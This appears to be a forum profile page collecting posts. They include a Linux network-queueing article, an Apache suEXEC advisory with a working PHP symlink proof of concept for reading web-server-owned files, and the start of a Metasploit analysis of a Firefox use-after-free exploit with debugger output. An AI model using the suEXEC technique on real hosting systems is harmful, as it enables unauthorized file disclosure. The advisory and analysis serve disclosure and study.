
Nytro

Everything posted by Nytro

  1. Queueing in the Linux Network Stack

[A slightly shorter and edited version of this article appeared in the July 2013 issue of Linux Journal. Thanks to Linux Journal's great copyright policy I'm still allowed to post this on my site. Go here to subscribe to Linux Journal.]

Packet queues are a core component of any network stack or device. They allow for asynchronous modules to communicate, increase performance and have the side effect of impacting latency. This article aims to explain where IP packets are queued in the Linux network stack, how interesting new latency-reducing features such as BQL operate and how to control buffering for reduced latency. The figure below will be referenced throughout and modified versions presented to illustrate specific concepts.

Figure 1 – Simplified high level overview of the queues on the transmit path of the Linux network stack

Driver Queue (aka ring buffer)

Between the IP stack and the network interface controller (NIC) lies the driver queue. This queue is typically implemented as a first-in, first-out (FIFO) ring buffer – just think of it as a fixed-size buffer. The driver queue does not contain packet data. Instead it consists of descriptors which point to other data structures called socket kernel buffers (SKBs) which hold the packet data and are used throughout the kernel.

Figure 2 – Partially full driver queue with descriptors pointing to SKBs

The input source for the driver queue is the IP stack which queues complete IP packets. The packets may be generated locally or received on one NIC to be routed out another when the device is functioning as an IP router. Packets added to the driver queue by the IP stack are dequeued by the hardware driver and sent across a data bus to the NIC hardware for transmission.

The reason the driver queue exists is to ensure that whenever the system has data to transmit, the data is available to the NIC for immediate transmission.
That is, the driver queue gives the IP stack a location to queue data asynchronously from the operation of the hardware. One alternative design would be for the NIC to ask the IP stack for data whenever the physical medium is ready to transmit. Since responding to this request cannot be instantaneous, this design wastes valuable transmission opportunities resulting in lower throughput. The opposite approach would be for the IP stack to wait after a packet is created until the hardware is ready to transmit. This is also not ideal because the IP stack cannot move on to other work.

Huge Packets from the Stack

Most NICs have a fixed maximum transmission unit (MTU) which is the biggest frame which can be transmitted by the physical media. For Ethernet the default MTU is 1,500 bytes but some Ethernet networks support Jumbo Frames of up to 9,000 bytes. Inside the IP network stack, the MTU can manifest as a limit on the size of the packets which are sent to the device for transmission. For example, if an application writes 2,000 bytes to a TCP socket then the IP stack needs to create two IP packets to keep the packet size less than or equal to a 1,500 byte MTU. For large data transfers the comparably small MTU causes a large number of small packets to be created and transferred through the driver queue.

In order to avoid the overhead associated with a large number of packets on the transmit path, the Linux kernel implements several optimizations: TCP segmentation offload (TSO), UDP fragmentation offload (UFO) and generic segmentation offload (GSO). All of these optimizations allow the IP stack to create packets which are larger than the MTU of the outgoing NIC. For IPv4, packets as large as the IPv4 maximum of 65,535 bytes can be created and queued to the driver queue. In the case of TSO and UFO, the NIC hardware takes responsibility for breaking the single large packet into packets small enough to be transmitted on the physical interface.
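Without offloads, that per-MTU splitting is exactly what the stack must do. A quick sketch of the arithmetic (an illustration, not kernel code):

```python
def segment(payload_len, mtu=1500):
    """Split an application write into per-packet payload sizes no
    larger than the MTU (header overhead ignored for simplicity)."""
    sizes = []
    while payload_len > 0:
        take = min(payload_len, mtu)
        sizes.append(take)
        payload_len -= take
    return sizes

print(segment(2000))        # [1500, 500]: a 2,000 byte write becomes two packets
print(len(segment(65535)))  # 44: packets needed at the IPv4 maximum size
```

With TSO/UFO/GSO enabled, this split is deferred until the last possible moment (NIC hardware or just before the driver queue), which is where the per-packet overhead savings come from.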
For NICs without hardware support, GSO performs the same operation in software immediately before queueing to the driver queue. Recall from earlier that the driver queue contains a fixed number of descriptors which each point to packets of varying sizes. Since TSO, UFO and GSO allow for much larger packets, these optimizations have the side effect of greatly increasing the number of bytes which can be queued in the driver queue. Figure 3 illustrates this concept in contrast with figure 2.

Figure 3 – Large packets can be sent to the NIC when TSO, UFO or GSO are enabled. This can greatly increase the number of bytes in the driver queue.

While the rest of this article focuses on the transmit path, it is worth noting that Linux also has receive side optimizations which operate similarly to TSO, UFO and GSO. These optimizations also have the goal of reducing per-packet overhead. Specifically, generic receive offload (GRO) allows the NIC driver to combine received packets into a single large packet which is then passed to the IP stack. When forwarding packets, GRO allows for the original packets to be reconstructed, which is necessary to maintain the end-to-end nature of IP packets. However, there is one side effect: when the large packet is broken up on the transmit side of the forwarding operation, it results in several packets for the flow being queued at once. This 'micro-burst' of packets can negatively impact inter-flow latencies.

Starvation and Latency

Despite its necessity and benefits, the queue between the IP stack and the hardware introduces two problems: starvation and latency. If the NIC driver wakes to pull packets off of the queue for transmission and the queue is empty, the hardware will miss a transmission opportunity thereby reducing the throughput of the system. This is referred to as starvation. Note that an empty queue when the system does not have anything to transmit is not starvation – this is normal.
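The starvation case can be made concrete with a toy model of the driver queue. The class and field names here are invented for illustration; this is not the kernel's data structure, just the FIFO-of-descriptors idea:

```python
from collections import deque

class DriverQueue:
    """Toy descriptor ring: a fixed-size FIFO of references to packet
    buffers. The IP stack fills it; the hardware driver drains it."""
    def __init__(self, num_descriptors):
        self.ring = deque()
        self.capacity = num_descriptors

    def enqueue(self, skb):
        if len(self.ring) >= self.capacity:
            return False              # ring full: the stack must hold or drop
        self.ring.append(skb)         # descriptor points at the packet buffer
        return True

    def dequeue(self):
        # Returns None when the ring is empty. If the system still had data
        # to send, that empty dequeue is a missed transmit opportunity:
        # starvation.
        return self.ring.popleft() if self.ring else None

q = DriverQueue(num_descriptors=2)
q.enqueue("pkt0")
print(q.dequeue())  # pkt0 -- first in, first out
print(q.dequeue())  # None -- the hardware was ready but had nothing to send
```

The asynchrony is the crux: whether the second `dequeue` finds a packet depends entirely on whether the filling side ran again in time, which is why a larger ring lowers the starvation risk.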
The complication associated with avoiding starvation is that the IP stack which fills the queue and the hardware driver which drains the queue run asynchronously. Worse, the duration between fill or drain events varies with the load on the system and external conditions such as the network interface's physical medium. For example, on a busy system the IP stack will get fewer opportunities to add packets to the buffer which increases the chances that the hardware will drain the buffer before more packets are queued. For this reason it is advantageous to have a very large buffer to reduce the probability of starvation and ensure high throughput.

While a large queue is necessary for a busy system to maintain high throughput, it has the downside of allowing for the introduction of a large amount of latency.

Figure 4 – Interactive packet (yellow) behind bulk flow packets (blue)

Figure 4 shows a driver queue which is almost full with TCP segments for a single high bandwidth, bulk traffic flow (blue). Queued last is a packet from a VoIP or gaming flow (yellow). Interactive applications like VoIP or gaming typically emit small packets at fixed intervals which are latency sensitive, while a high bandwidth data transfer generates a higher packet rate and larger packets. This higher packet rate can fill the buffer between interactive packets causing the transmission of the interactive packet to be delayed.

To further illustrate this behaviour consider a scenario based on the following assumptions:

  • A network interface which is capable of transmitting at 5 Mbit/sec or 5,000,000 bits/sec.
  • Each packet from the bulk flow is 1,500 bytes or 12,000 bits.
  • Each packet from the interactive flow is 500 bytes.
  • The depth of the queue is 128 descriptors.
  • There are 127 bulk data packets and 1 interactive packet queued last.
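The scenario above reduces to simple serialization-delay arithmetic, sketched here:

```python
def drain_time_s(queued_packets, packet_bytes, link_bps):
    """Time for the link to transmit the packets queued ahead of the
    interactive packet: bits queued divided by link rate."""
    return queued_packets * packet_bytes * 8 / link_bps

# 127 bulk packets of 1,500 bytes ahead of the interactive packet,
# on a 5 Mbit/sec link:
t = drain_time_s(queued_packets=127, packet_bytes=1500, link_bps=5_000_000)
print(int(t * 1000))  # 304 -- milliseconds the interactive packet waits
```

Note that this counts only one-way queueing delay on one device; the same link at a higher rate, or a shorter queue, shrinks the wait proportionally.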
Given the above assumptions, the time required to drain the 127 bulk packets and create a transmission opportunity for the interactive packet is (127 * 12,000) / 5,000,000 = 0.304 seconds (304 milliseconds for those who think of latency in terms of ping results). This amount of latency is well beyond what is acceptable for interactive applications and this does not even represent the complete round trip time – it is only the time required to transmit the packets queued before the interactive one. As described earlier, the size of the packets in the driver queue can be larger than 1,500 bytes if TSO, UFO or GSO are enabled. This makes the latency problem correspondingly worse.

Large latencies introduced by oversized, unmanaged buffers are known as Bufferbloat. For a more detailed explanation of this phenomenon see Controlling Queue Delay and the Bufferbloat project. As the above discussion illustrates, choosing the correct size for the driver queue is a Goldilocks problem – it can't be too small or throughput suffers, it can't be too big or latency suffers.

Byte Queue Limits (BQL)

Byte Queue Limits (BQL) is a new feature in recent Linux kernels (> 3.3.0) which attempts to solve the problem of driver queue sizing automatically. This is accomplished by adding a layer which enables and disables queueing to the driver queue based on calculating the minimum buffer size required to avoid starvation under the current system conditions. Recall from earlier that the smaller the amount of queued data, the lower the maximum latency experienced by queued packets.

It is key to understand that the actual size of the driver queue is not changed by BQL. Rather, BQL calculates a limit of how much data (in bytes) can be queued at the current time. Any bytes over this limit must be held or dropped by the layers above the driver queue.

The BQL mechanism operates when two events occur: when packets are enqueued to the driver queue and when a transmission to the wire has completed.
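These two hooks — enqueue and transmit completion — can be sketched as a toy model of the simplified algorithm described next. This is an illustration of the idea only, with invented names and numbers; it is not the kernel's actual dynamic queue limits (dql) implementation:

```python
class ToyBQL:
    """Toy model: track queued bytes against a LIMIT that grows after
    starvation and shrinks when the hardware stayed busy with leftovers."""
    def __init__(self, limit):
        self.limit = limit
        self.queued = 0
        self.queue_enabled = True

    def enqueue(self, nbytes):
        # Data is queued before the LIMIT check, so queued bytes can
        # overshoot LIMIT (e.g. one large TSO/GSO enqueue).
        self.queued += nbytes
        if self.queued > self.limit:
            self.queue_enabled = False

    def tx_complete(self, sent, starved):
        # End of an interval: adjust LIMIT based on what happened.
        self.queued -= sent
        if starved:
            self.limit += sent                # starved: allow more queueing
        elif self.queued > 0:
            self.limit -= self.queued         # busy with leftovers: shrink
        if self.queued < self.limit:
            self.queue_enabled = True

bql = ToyBQL(limit=10_000)
bql.enqueue(64_000)             # one oversized enqueue blows past LIMIT
print(bql.queue_enabled)        # False: upper layers must hold their data
bql.tx_complete(sent=64_000, starved=True)
print(bql.limit > 10_000)       # True: starvation grew the limit
```

The feedback loop is the point: LIMIT converges toward the smallest value that keeps the hardware busy, rather than toward the ring's physical capacity.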
A simplified version of the BQL algorithm is outlined below. LIMIT refers to the value calculated by BQL.

****
** After adding packets to the queue
****
if the number of queued bytes is over the current LIMIT value then
    disable the queueing of more data to the driver queue

Notice that the amount of queued data can exceed LIMIT because data is queued before the LIMIT check occurs. Since a large number of bytes can be queued in a single operation when TSO, UFO or GSO are enabled, these throughput optimizations have the side effect of allowing a higher than desirable amount of data to be queued. If you care about latency you probably want to disable these features. See later parts of this article for how to accomplish this.

The second stage of BQL is executed after the hardware has completed a transmission (simplified pseudo-code):

****
** When the hardware has completed sending a batch of packets
** (Referred to as the end of an interval)
****
if the hardware was starved in the interval
    increase LIMIT
else if the hardware was busy during the entire interval (not starved) and there are bytes to transmit
    decrease LIMIT by the number of bytes not transmitted in the interval

if the number of queued bytes is less than LIMIT
    enable the queueing of more data to the buffer

As you can see, BQL is based on testing whether the device was starved. If it was starved, then LIMIT is increased allowing more data to be queued which reduces the chance of starvation. If the device was busy for the entire interval and there are still bytes to be transferred in the queue then the queue is bigger than is necessary for the system under the current conditions and LIMIT is decreased to constrain the latency.

A real world example may help provide a sense of how much BQL affects the amount of data which can be queued. On one of my servers the driver queue size defaults to 256 descriptors.
Since the Ethernet MTU is 1,500 bytes this means up to 256 * 1,500 = 384,000 bytes can be queued to the driver queue (TSO, GSO etc are disabled or this would be much higher). However, the limit value calculated by BQL is 3,012 bytes. As you can see, BQL greatly constrains the amount of data which can be queued.

An interesting aspect of BQL can be inferred from the first word in the name – byte. Unlike the size of the driver queue and most other packet queues, BQL operates on bytes. This is because the number of bytes has a more direct relationship with the time required to transmit to the physical medium than the number of packets or descriptors, since the latter are variably sized.

BQL reduces network latency by limiting the amount of queued data to the minimum required to avoid starvation. It also has the very important side effect of moving the point where most packets are queued from the driver queue, which is a simple FIFO, to the queueing discipline (QDisc) layer, which is capable of implementing much more complicated queueing strategies. The next section introduces the Linux QDisc layer.

Queuing Disciplines (QDisc)

The driver queue is a simple first in, first out (FIFO) queue. It treats all packets equally and has no capabilities for distinguishing between packets of different flows. This design keeps the NIC driver software simple and fast. Note that more advanced Ethernet and most wireless NICs support multiple independent transmission queues but similarly each of these queues is typically a FIFO. A higher layer is responsible for choosing which transmission queue to use.

Sandwiched between the IP stack and the driver queue is the queueing discipline (QDisc) layer (see Figure 1). This layer implements the traffic management capabilities of the Linux kernel which include traffic classification, prioritization and rate shaping. The QDisc layer is configured through the somewhat opaque tc command.
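To make the contrast with the driver FIFO concrete, here is a toy two-band priority queue of the kind a QDisc can implement. It is a sketch for illustration only; a real QDisc such as pfifo_fast uses three bands selected by TOS bits, not this invented class:

```python
from collections import deque

class PrioQDisc:
    """Toy classful queueing: band 0 (interactive) is always drained
    before band 1 (bulk) -- unlike the driver queue's strict FIFO."""
    def __init__(self, num_bands=2):
        self.bands = [deque() for _ in range(num_bands)]

    def enqueue(self, pkt, band):
        self.bands[band].append(pkt)

    def dequeue(self):
        for band in self.bands:       # highest-priority non-empty band wins
            if band:
                return band.popleft()
        return None

qd = PrioQDisc()
qd.enqueue("bulk-0", band=1)
qd.enqueue("bulk-1", band=1)
qd.enqueue("voip", band=0)    # arrives last but is latency sensitive
print(qd.dequeue())           # voip -- jumps ahead of the queued bulk packets
```

This is why BQL matters: with most queued bytes held at this layer instead of the driver FIFO, a scheduling decision like the one above can still rescue the interactive packet.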
There are three key concepts to understand in the QDisc layer: QDiscs, classes and filters.

The QDisc is the Linux abstraction for traffic queues which are more complex than the standard FIFO queue. This interface allows the QDisc to carry out complex queue management behaviours without requiring the IP stack or the NIC driver to be modified. By default every network interface is assigned a pfifo_fast QDisc which implements a simple three band prioritization scheme based on the TOS bits. Despite being the default, the pfifo_fast QDisc is far from the best choice because it defaults to having very deep queues (see txqueuelen below) and is not flow aware.

The second concept, which is closely related to the QDisc, is the class. Individual QDiscs may implement classes in order to handle subsets of the traffic differently. For example, the Hierarchical Token Bucket (HTB) QDisc allows the user to configure 500Kbps and 300Kbps classes and direct traffic to each as desired. Not all QDiscs have support for multiple classes – those that do are referred to as classful QDiscs.

Filters (also called classifiers) are the mechanism used to classify traffic to a particular QDisc or class. There are many different types of filters of varying complexity, with u32 being the most general and the flow filter perhaps the easiest to use. The documentation for the flow filter is lacking but you can find an example in one of my QoS scripts. For more detail on QDiscs, classes and filters see the LARTC HOWTO and the tc man pages.

Buffering between the transport layer and the queueing disciplines

In looking at the previous figures you may have noticed that there are no packet queues above the queueing discipline layer. What this means is that the network stack places packets directly into the queueing discipline or else pushes back on the upper layers (eg the socket buffer) if the queue is full. The obvious question that follows is what happens when the stack has a lot of data to send?
This could occur as the result of a TCP connection with a large congestion window or, even worse, an application sending UDP packets as fast as it can. The answer is that for a QDisc with a single queue, the same problem outlined in Figure 4 for the driver queue occurs. That is, a single high bandwidth or high packet rate flow can consume all of the space in the queue causing packet loss and adding significant latency to other flows. Even worse, this creates another point of buffering where a standing queue can form which increases latency and causes problems for TCP's RTT and congestion window size calculations. Since Linux defaults to the pfifo_fast QDisc which effectively has a single queue (because most traffic is marked with TOS=0) this phenomenon is not uncommon.

As of Linux 3.6.0 (2012-09-30), the Linux kernel has a new feature called TCP Small Queues which aims to solve this problem for TCP. TCP Small Queues adds a per-TCP-flow limit on the number of bytes which can be queued in the QDisc and driver queue at any one time. This has the interesting side effect of causing the kernel to push back on the application earlier which allows the application to more effectively prioritize writes to the socket. At present (2012-12-28) it is still possible for single flows from other transport protocols to flood the QDisc layer.

Another partial solution to the transport layer flood problem, one which is transport layer agnostic, is to use a QDisc which has many queues, ideally one per network flow. Both the Stochastic Fairness Queueing (SFQ) and Fair Queueing with Controlled Delay (fq_codel) QDiscs fit this problem nicely as they effectively have a queue per network flow.

How to manipulate the queue sizes in Linux

Driver Queue

The ethtool command is used to control the driver queue size for Ethernet devices. ethtool also provides low level interface statistics as well as the ability to enable and disable IP stack and driver features.
The -g flag to ethtool displays the driver queue (ring) parameters:

[root@alpha net-next]# ethtool -g eth0
Ring parameters for eth0:
Pre-set maximums:
RX:        16384
RX Mini:   0
RX Jumbo:  0
TX:        16384
Current hardware settings:
RX:        512
RX Mini:   0
RX Jumbo:  0
TX:        256

You can see from the above output that the driver for this NIC defaults to 256 descriptors in the transmission queue. Early in the Bufferbloat investigation it was often recommended to reduce the size of the driver queue in order to reduce latency. With the introduction of BQL (assuming your NIC driver supports it) there is no longer any reason to modify the driver queue size (see below for how to configure BQL).

ethtool also allows you to manage optimization features such as TSO, UFO and GSO. The -k flag displays the current offload settings and -K modifies them.

[dan@alpha ~]$ ethtool -k eth0
Offload parameters for eth0:
rx-checksumming: off
tx-checksumming: off
scatter-gather: off
tcp-segmentation-offload: off
udp-fragmentation-offload: off
generic-segmentation-offload: off
generic-receive-offload: on
large-receive-offload: off
rx-vlan-offload: off
tx-vlan-offload: off
ntuple-filters: off
receive-hashing: off

Since TSO, GSO, UFO and GRO greatly increase the number of bytes which can be queued in the driver queue you should disable these optimizations if you want to optimize for latency over throughput. It's doubtful you will notice any CPU impact or throughput decrease when disabling these features unless the system is handling very high data rates.

Byte Queue Limits (BQL)

The BQL algorithm is self tuning so you probably don't need to mess with this too much. However, if you are concerned about optimal latencies at low bitrates then you may want to override the upper limit on the calculated LIMIT value. BQL state and configuration can be found in a /sys directory based on the location and name of the NIC.
On my server the directory for eth0 is:

/sys/devices/pci0000:00/0000:00:14.0/net/eth0/queues/tx-0/byte_queue_limits

The files in this directory are:

  • hold_time: Time between modifying LIMIT in milliseconds.
  • inflight: The number of queued but not yet transmitted bytes.
  • limit: The LIMIT value calculated by BQL. 0 if BQL is not supported in the NIC driver.
  • limit_max: A configurable maximum value for LIMIT. Set this value lower to optimize for latency.
  • limit_min: A configurable minimum value for LIMIT. Set this value higher to optimize for throughput.

To place a hard upper limit on the number of bytes which can be queued, write the new value to the limit_max file:

echo "3000" > limit_max

What is txqueuelen?

Often in early Bufferbloat discussions the idea of statically reducing the NIC transmission queue was mentioned. The current size of the transmission queue can be obtained from the ip and ifconfig commands. Confusingly, these commands name the transmission queue length differently (bold text):

[dan@alpha ~]$ ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:18:F3:51:44:10
     inet addr:69.41.199.58 Bcast:69.41.199.63 Mask:255.255.255.248
     inet6 addr: fe80::218:f3ff:fe51:4410/64 Scope:Link
     UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
     RX packets:435033 errors:0 dropped:0 overruns:0 frame:0
     TX packets:429919 errors:0 dropped:0 overruns:0 carrier:0
     collisions:0 txqueuelen:1000
     RX bytes:65651219 (62.6 MiB) TX bytes:132143593 (126.0 MiB)
     Interrupt:23

[dan@alpha ~]$ ip link
1: lo: mtu 16436 qdisc noqueue state UNKNOWN
   link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000
   link/ether 00:18:f3:51:44:10 brd ff:ff:ff:ff:ff:ff

The length of the transmission queue in Linux defaults to 1,000 packets which is a large amount of buffering especially at low bandwidths. The interesting question is what exactly does this variable control? This wasn't clear to me so I spent some time spelunking in the kernel source.
From what I can tell, the txqueuelen is only used as a default queue length for some of the queueing disciplines. Specifically:

  • pfifo_fast (Linux default queueing discipline)
  • sch_fifo
  • sch_gred
  • sch_htb (only for the default queue)
  • sch_plug
  • sch_sfb
  • sch_teql

Looking back at Figure 1, the txqueuelen parameter controls the size of the queues in the Queueing Discipline box for the QDiscs listed above. For most of these queueing disciplines, the "limit" argument on the tc command line overrides the txqueuelen default. In summary, if you do not use one of the above queueing disciplines or if you override the queue length then the txqueuelen value is meaningless.

As an aside, I find it a little confusing that the ifconfig command shows low level details of the network interface such as the MAC address but the txqueuelen parameter refers to the higher level QDisc layer. It would seem more appropriate for ifconfig to show the driver queue size.

The length of the transmission queue is configured with the ip or ifconfig commands:

[root@alpha dan]# ip link set txqueuelen 500 dev eth0

Notice that the ip command uses "txqueuelen" but when displaying the interface details it uses "qlen" – another unfortunate inconsistency.

Queueing Disciplines

As introduced earlier, the Linux kernel has a large number of queueing disciplines (QDiscs) each of which implements its own packet queues and behaviour. Describing the details of how to configure each of the QDiscs is out of scope for this article. For full details see the tc man page (man tc). You can find details for each QDisc in 'man tc qdisc-name' (ex: 'man tc htb' or 'man tc fq_codel'). LARTC is also a very useful resource but is missing information on newer features. Below are a few tips and tricks related to the tc command that may be helpful:

The HTB QDisc implements a default queue which receives all packets if they are not classified with filter rules.
Some other QDiscs such as DRR simply black hole traffic that is not classified. To see how many packets were not classified properly and were directly queued into the default HTB class see the direct_packets_stat in "tc qdisc show".

The HTB class hierarchy is only useful for classification, not bandwidth allocation. All bandwidth allocation occurs by looking at the leaves and their associated priorities.

The QDisc infrastructure identifies QDiscs and classes with major and minor numbers which are separated by a colon. The major number is the QDisc identifier and the minor number the class within that QDisc. The catch is that the tc command uses a hexadecimal representation of these numbers on the command line. Since many strings are valid in both hex and decimal (e.g. 10) many users don't even realize that tc uses hex. See one of my tc scripts for how I deal with this.

If you are using ADSL, which is ATM based (most DSL services are ATM based but newer variants such as VDSL2 are not always), you probably want to add the "linklayer adsl" option. This accounts for the overhead which comes from breaking IP packets into a bunch of 53-byte ATM cells. If you are using PPPoE then you probably want to account for the PPPoE overhead with the 'overhead' parameter.

TCP Small Queues

The per-socket TCP queue limit can be viewed and controlled with the following /proc file:

/proc/sys/net/ipv4/tcp_limit_output_bytes

My understanding is that you should not need to modify this value in any normal situation.

Oversized Queues Outside Of Your Control

Unfortunately not all of the oversized queues which will affect your Internet performance are under your control. Most commonly the problem will lie in the device which attaches to your service provider (eg a DSL or cable modem) or in the service provider's equipment itself. In the latter case there isn't much you can do because there is no way to control the traffic which is sent towards you.
However in the upstream direction you can shape the traffic to slightly below the link rate. This will stop the queue in the device from ever having more than a couple of packets. Many residential home routers have a rate limit setting which can be used to shape below the link rate. If you are using a Linux box as a router, shaping below the link rate also allows the kernel's queueing features to be effective. You can find many example tc scripts online including the one I use with some related performance results.

Summary

Queueing in packet buffers is a necessary component of any packet network, both within a device and across network elements. Properly managing the size of these buffers is critical to achieving good network latency especially under load. While static buffer sizing can play a role in decreasing latency, the real solution is intelligent management of the amount of queued data. This is best accomplished through dynamic schemes such as BQL and active queue management (AQM) techniques like Codel. This article outlined where packets are queued in the Linux network stack, how features related to queueing are configured and provided some guidance on how to achieve low latency.

Related Links

  • Controlling Queue Delay – A fantastic explanation of network queueing and an introduction to the Codel algorithm.
  • Presentation of Codel at the IETF – Basically a video version of the Controlling Queue Delay article.
  • Bufferbloat: Dark Buffers in the Internet – An early Bufferbloat article.
  • Linux Advanced Routing and Traffic Control Howto (LARTC) – Probably still the best documentation of the Linux tc command although it's somewhat out of date with respect to new features such as fq_codel.
  • TCP Small Queues on LWN
  • Byte Queue Limits on LWN

Thanks

Thanks to Kevin Mason, Simon Barber, Lucas Fontes and Rami Rosen for reviewing this article and providing helpful feedback.

Source: Queueing in the Linux Network Stack | Dan Siemon
  2. Yes — send us a PM with the IPs from which you cannot access the forum, because we are having some minor technical problems with the crystal balls we had been using...
  3. [h=1]Apache suEXEC Privilege Elevation / Information Disclosure[/h]

Apache suEXEC privilege elevation / information disclosure
Discovered by Kingcope/Aug 2013

The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs.

With this bug, an attacker who is able to run php or cgi code inside a web hosting environment that is configured to use suEXEC as a protection mechanism is able to read any file and directory on the filesystem of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user-id inside a suEXEC configured environment.

Take for example this apache owned file and the php script that follows.

$ ls -la /etc/testapache
-rw------- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache

Only user www-data should be able to read this file.

$ cat test.php
<?php
system("id; cat /etc/testapache");
?>

When calling the php file using a webbrowser it will show...

uid=1002(example) gid=1002(example) groups=1002(example)

...because the php script is run through suEXEC. The script will not output the file requested because of a permissions error.

Now if we create a .htaccess file with the content...

Options Indexes FollowSymLinks

...and a php script with the content...

<?php
system("ln -sf / test99.php");
symlink("/", "test99.php"); // try builtin function in case system() is blocked
?>

...in the same folder, we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'.
A request to test99.php/etc/testapache done with a web browser shows... voila! Read with the apache uid/gid. The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case.

Version notes. Assumed is that all Apache versions are affected by this bug.

apache2 -V
Server version: Apache/2.2.22 (Debian)
Server built: Mar 4 2013 21:32:32
Server's Module Magic Number: 20051115:30
Server loaded: APR 1.4.6, APR-Util 1.4.1
Compiled using: APR 1.4.6, APR-Util 1.4.1
Architecture: 32-bit
Server MPM: Worker
  threaded: yes (fixed thread count)
  forked: yes (variable process count)
Server compiled with....
 -D APACHE_MPM_DIR="server/mpm/worker"
 -D APR_HAS_SENDFILE
 -D APR_HAS_MMAP
 -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
 -D APR_USE_SYSVSEM_SERIALIZE
 -D APR_USE_PTHREAD_SERIALIZE
 -D APR_HAS_OTHER_CHILD
 -D AP_HAVE_RELIABLE_PIPED_LOGS
 -D DYNAMIC_MODULE_LIMIT=128
 -D HTTPD_ROOT="/etc/apache2"
 -D SUEXEC_BIN="/usr/lib/apache2/suexec"
 -D DEFAULT_PIDLOG="/var/run/apache2.pid"
 -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
 -D DEFAULT_ERRORLOG="logs/error_log"
 -D AP_TYPES_CONFIG_FILE="mime.types"
 -D SERVER_CONFIG_FILE="apache2.conf"

Cheers,
/Kingcope

Source: Apache suEXEC Privilege Elevation / Information Disclosure
  4. Here's that FBI Firefox Exploit for You (CVE-2013-1690)

Posted by sinn3r in Metasploit on Aug 7, 2013 5:02:42 PM

Hello fellow hackers, I hope you guys had a blast at Defcon partying it up and hacking all the things, because ready or not, here's more work for you. During the second day of the conference, I noticed a reddit post regarding some Mozilla Firefox 0day possibly being used by the FBI in order to identify some users using Tor for a crackdown on child pornography. The security community was amazing: within hours, we found more information such as a brief analysis of the payload, a simplified PoC, the bug report on Mozilla, etc. The same day, I flew back to the Metasploit hideout (with Juan already there), and we started playing catch-up on the vulnerability.

Brief Analysis

The vulnerability was originally discovered and reported by researcher "nils". You can see his discussion about the bug on Twitter. A proof-of-concept can be found here. We began with a crash with a modified version of the PoC:

eax=72622f2f ebx=000b2440 ecx=0000006e edx=00000000 esi=07adb980 edi=065dc4ac
eip=014c51ed esp=000b2350 ebp=000b2354 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
xul!DocumentViewerImpl::Stop+0x58:
014c51ed 8b08 mov ecx,dword ptr [eax] ds:0023:72622f2f=????????

EAX is a value from ESI. One way to track where this allocation came from is by putting a breakpoint at moz_xmalloc:

...
bu mozalloc!moz_xmalloc+0xc "r $t0=poi(esp+c); .if (@$t0==0xc4) {.printf \"Addr=0x%08x, Size=0x%08x\",eax, @$t0; .echo; k; .echo}; g"
...
Addr=0x07adb980, Size=0x000000c4
ChildEBP RetAddr
0012cd00 014ee6b1 mozalloc!moz_xmalloc+0xc [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\memory\mozalloc\mozalloc.cpp @ 57]
0012cd10 013307db xul!NS_NewContentViewer+0xe [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer

The callstack tells us this was allocated in nsdocumentviewer.cpp, at line 497, which leads to the following function.
When the DocumentViewerImpl object is created while the page is being loaded, this also triggers a malloc() with size 0xC4 to store it:

nsresult
NS_NewContentViewer(nsIContentViewer** aResult)
{
  *aResult = new DocumentViewerImpl();
  NS_ADDREF(*aResult);
  return NS_OK;
}

In the PoC, window.stop() is called repeatedly; it is meant to stop document parsing, but the calls do not actually terminate, they just hang. Eventually this leads to some sort of exhaustion that allows the script to continue, and the DocumentViewerImpl object lives on. We then arrive at the next line: ownerDocument.write(). The ownerDocument.write() function is used to write to the parent frame, but its real purpose is to trigger xul!nsDocShell::Destroy, which deletes DocumentViewerImpl:

Free DocumentViewerImpl at: 0x073ab940
ChildEBP RetAddr
000b0b84 01382f42 xul!DocumentViewerImpl::`scalar deleting destructor'+0x10
000b0b8c 01306621 xul!DocumentViewerImpl::Release+0x22 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\layout\base\nsdocumentviewer.cpp @ 548]
000b0bac 01533892 xul!nsDocShell::Destroy+0x14f [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\docshell\base\nsdocshell.cpp @ 4847]
000b0bc0 0142b4cc xul!nsFrameLoader::Finalize+0x29 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsframeloader.cpp @ 579]
000b0be0 013f4ebd xul!nsDocument::MaybeInitializeFinalizeFrameLoaders+0xec [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 5481]
000b0c04 0140c444 xul!nsDocument::EndUpdate+0xcd [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 4020]
000b0c14 0145f318 xul!mozAutoDocUpdate::~mozAutoDocUpdate+0x34 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\mozautodocupdate.h @ 35]
000b0ca4 014ab5ab xul!nsDocument::ResetToURI+0xf8 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2149]
000b0ccc 01494a8b xul!nsHTMLDocument::ResetToURI+0x20 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 287]
000b0d04 014d583a xul!nsDocument::Reset+0x6b [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\base\src\nsdocument.cpp @ 2088]
000b0d18 01c95c6f xul!nsHTMLDocument::Reset+0x12 [e:\builds\moz2_slave\rel-m-rel-w32-bld\build\content\html\document\src\nshtmldocument.cpp @ 274]
